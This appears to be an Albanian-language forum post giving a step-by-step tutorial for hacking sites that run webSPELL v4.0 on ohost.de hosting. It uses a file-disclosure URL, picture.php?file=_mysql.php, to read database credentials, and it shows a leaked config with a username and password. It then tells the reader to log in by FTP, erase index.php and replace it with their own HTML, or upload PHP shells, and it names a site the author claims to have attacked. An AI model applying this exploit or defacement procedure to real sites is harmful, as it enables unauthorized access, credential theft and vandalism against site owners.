--------------------------------------------------------------------------------
Shko ne Yahoo edhe kerko: webSPELL v4.0 ohost.de
Edhe gjeje nje Faqe nbas ti ta gjesh
psh. faqja
www.webi.we.ohost.de Veje ket picture.php?file=_mysql.php Ajo edhte ta qelish Mysql Injection
www.viktima.com/picture.php?file=_mysql.php Edhe shtype ENTER edhe de dale krejt bardh nese e perdor
Internet explorer,Firefox,Opera etj.. Shko view page source
Edhe de e dale kshu te page source code
<?php
$host = \"localhost\";
$user = \"hancock\";
$pwd = \"welove123\";
$db = \"hancock\";
define(PREFIX, \'webs_\');
?>
Te e jotja $user = \"hancock\"; $pwd = \"welove123\"; te jese ndryshe
Te do faqe de dale $host = \"mysql.viktimi.com\";
Tash $user = \"hancock\"; Ku thot $user= edhe useri
Ku thot $pwd = Edhe passwordi
tash duhet ta merni filezilla ose flash fxp
Installoje edhe hape shko quic konnect Host :
www.webi.we.ohostdeUser:Useri
Passassi
Connect Nbas sit konektohesh Ka dy menyra Mundesh ta perdorish Php shells ose E ban edit index.php pi te Filezilla ose Flash FXP
Ma let baje edit index.php Edhe fshi krejt cka ka aty te index.php Edhe vej HTML CODE tuaja
Edhe baje save
NEse ka $host = \"p.sh. mysql.viktima.com\"; shko p.sh mysql.viktima.com Edhe hyn me passin edhe me userin
E qashtu e mundesh me hakirat Faqet cka jan me ohost.de
Une e kam provuar ketu
http://dsdemo.ds.ohost.de Shko edhe ti nese do heren e par te hakirish
Edhe per ta bo qi mos ta hakire dikush qeter me ket kod picture.php?file=_mysql.php
baje edit _mysql.php edhe ven ckat dush aty me e provu qeter kush p.sh.
www.viktima.com/picture.php?file=_mysql.php Nuk de baje Sen e hakire qeter kush mo
__________________